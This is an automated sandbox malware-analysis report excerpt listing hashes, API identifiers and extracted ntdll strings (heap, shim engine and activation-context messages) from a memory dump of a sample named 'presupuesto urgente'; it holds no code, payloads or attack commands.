                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: de4275324e7b7af169fc74510b540f3f7effc05f8ecb51651c370032e833fb53
                                                                                                                                                      • Instruction ID: 2800e0ed8f566d59eebbcae316cfbf026fbf2867015daf55e2f178145241f775
                                                                                                                                                      • Opcode Fuzzy Hash: de4275324e7b7af169fc74510b540f3f7effc05f8ecb51651c370032e833fb53
                                                                                                                                                      • Instruction Fuzzy Hash: 5590022130144882D54063585914B0F414587E1203F91CC1EA4146914CC925885D6B21
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                      • Instruction ID: 0ead659096ee62f44d26313d2cce3b7924b51afffbd7415f0dc9bfcd435db340
                                                                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                      • Instruction Fuzzy Hash:

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP:
                                                                                                                                                      • API String ID: 3446177414-2466845122

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      Strings
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 335A4530
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 335A4460
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 335A4507
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 335A4592
                                                                                                                                                      • Execute=1, xrefs: 335A451E
                                                                                                                                                      • ExecuteOptions, xrefs: 335A44AB
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 335A454D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                      • Opcode ID: 2cb3e1bb0d8d6496d5501ce1248cea0efafde1fd05cc52c8d29693f38fa89536
                                                                                                                                                      • Instruction ID: be389845c387cbe8792545d50126a3ddfd6ba86154a264d916e0e6c624868331
                                                                                                                                                      • Opcode Fuzzy Hash: 2cb3e1bb0d8d6496d5501ce1248cea0efafde1fd05cc52c8d29693f38fa89536
                                                                                                                                                      • Instruction Fuzzy Hash: A6511771E00319BBEF119AA8FC95FAD73B8EF58348F4404E9E505A7681EB709A41CF91

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      Strings
                                                                                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 335978F3
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 335977E2
                                                                                                                                                      • Actx , xrefs: 33597819, 33597880
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33597807
                                                                                                                                                      • SsHd, xrefs: 3354A304
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 335977DD, 33597802
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                      • API String ID: 0-1988757188
                                                                                                                                                      • Opcode ID: eaa608305c15ab8b67df66f88ad97aa5f3f25503f3872f86d543e4d5470a03be
                                                                                                                                                      • Instruction ID: cfc2e53b546f1286be6ed53e0e7e31bafd77cae5f6bb6968ef3e01a902964b9a
                                                                                                                                                      • Opcode Fuzzy Hash: eaa608305c15ab8b67df66f88ad97aa5f3f25503f3872f86d543e4d5470a03be
                                                                                                                                                      • Instruction Fuzzy Hash: DBE1E2746083028FE759CE24E88579A77E5BB84364F584A2EF8A5CB290E731D845CB91
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33599153
                                                                                                                                                      • GsHd, xrefs: 3354D794
                                                                                                                                                      • Actx , xrefs: 33599315
                                                                                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 33599372
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33599178
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 3359914E, 33599173
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                      • API String ID: 3446177414-2196497285
                                                                                                                                                      • Opcode ID: 251f924f8a885da7d2dcc620aa1fe9d4320d61f1d8e4f34f20ab5d3019bfcf8e
                                                                                                                                                      • Instruction ID: ed4f22d1a8e8bd7f1b78156c57769245593014015b8a725fb1c84873ad427b67
                                                                                                                                                      • Opcode Fuzzy Hash: 251f924f8a885da7d2dcc620aa1fe9d4320d61f1d8e4f34f20ab5d3019bfcf8e
                                                                                                                                                      • Instruction Fuzzy Hash: 34E1A074A08342DFE714CF14E880B5AB7F4BF88358F494A6DE895CB292D771E944CB92
                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 3352651C
                                                                                                                                                        • Part of subcall function 33526565: RtlDebugPrintTimes.NTDLL ref: 33526614
                                                                                                                                                        • Part of subcall function 33526565: RtlDebugPrintTimes.NTDLL ref: 3352665F
                                                                                                                                                      Strings
                                                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3358977C
                                                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 33589790
                                                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 335897B9
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 335897A0, 335897C9
                                                                                                                                                      • apphelp.dll, xrefs: 33526446
                                                                                                                                                      • LdrpInitShimEngine, xrefs: 33589783, 33589796, 335897BF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-204845295
                                                                                                                                                      • Opcode ID: 692a9d7e0ec442409490081eb149fcfa0b7c75c7be50af6d3a0efdd3847b64c3
                                                                                                                                                      • Instruction ID: a57ea8e81e22b9717e16959d4925abeb8fded316024a2314197439a93b9ac37d
                                                                                                                                                      • Opcode Fuzzy Hash: 692a9d7e0ec442409490081eb149fcfa0b7c75c7be50af6d3a0efdd3847b64c3
                                                                                                                                                      • Instruction Fuzzy Hash: 1351A071A09300AFE710DF24E891F5B7BE8EBC4644F810919F995EB5A1DB70D905CB92
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                      • API String ID: 3446177414-4227709934
                                                                                                                                                      • Opcode ID: 5a76b7da184e976400f2481616a0e5cd17a76442442b25bb0476e901381c2944
                                                                                                                                                      • Instruction ID: be048afe63cbfa6dcd3a6ffc29eb524cd10f1bd40463858d46dbcd0c86f952eb
                                                                                                                                                      • Opcode Fuzzy Hash: 5a76b7da184e976400f2481616a0e5cd17a76442442b25bb0476e901381c2944
                                                                                                                                                      • Instruction Fuzzy Hash: 56417CB5E01209AFDB02DF99D884ADEBBF5BF88754F144169EC00E7340D7719A11EB90
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                      • API String ID: 3446177414-3492000579
                                                                                                                                                      • Opcode ID: e69b4968d34b1a3b376affc7dbdfc5cdda2185c96a16850021a19f03aa37db4b
                                                                                                                                                      • Instruction ID: d511114a4f2859f96d1009ee435c88ae8aa5490dd381b3d57682ccfe68b4ee56
                                                                                                                                                      • Opcode Fuzzy Hash: e69b4968d34b1a3b376affc7dbdfc5cdda2185c96a16850021a19f03aa37db4b
                                                                                                                                                      • Instruction Fuzzy Hash: 0B71DE75901644EFDB02DF68E4606ADFBF2FF89700F48825AE885EB691CB359981CB50
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • LdrpLoadShimEngine, xrefs: 3358984A, 3358988B
                                                                                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33589843
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 33589854, 33589895
                                                                                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33589885
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-3589223738
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                      • API String ID: 3446177414-3224558752
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                      • API String ID: 3446177414-1222099010
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$@
                                                                                                                                                      • API String ID: 3446177414-1194432280
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                      • String ID: D&Nr
                                                                                                                                                      • API String ID: 4281723722-3640875199
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 3446177414-3610490719
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 33599F2E
                                                                                                                                                      • LdrpCheckModule, xrefs: 33599F24
                                                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 33599F1C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-161242083
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
• Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: ${]3
                                                                                                                                                      • API String ID: 0-3851408445
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 0$Flst
                                                                                                                                                      • API String ID: 0-758220159
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 33530586
                                                                                                                                                      • kLsE, xrefs: 335305FE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                      • API String ID: 3446177414-2547482624
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: ^R3
                                                                                                                                                      • API String ID: 3446177414-2450060645
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: 0$0
                                                                                                                                                      • API String ID: 3446177414-203156872
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • D&Nr, xrefs: 335CAAD1
                                                                                                                                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 335CAABF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: D&Nr$NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                                                      • API String ID: 3446177414-1343951190
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: R3$mR3
                                                                                                                                                      • API String ID: 3446177414-4232059398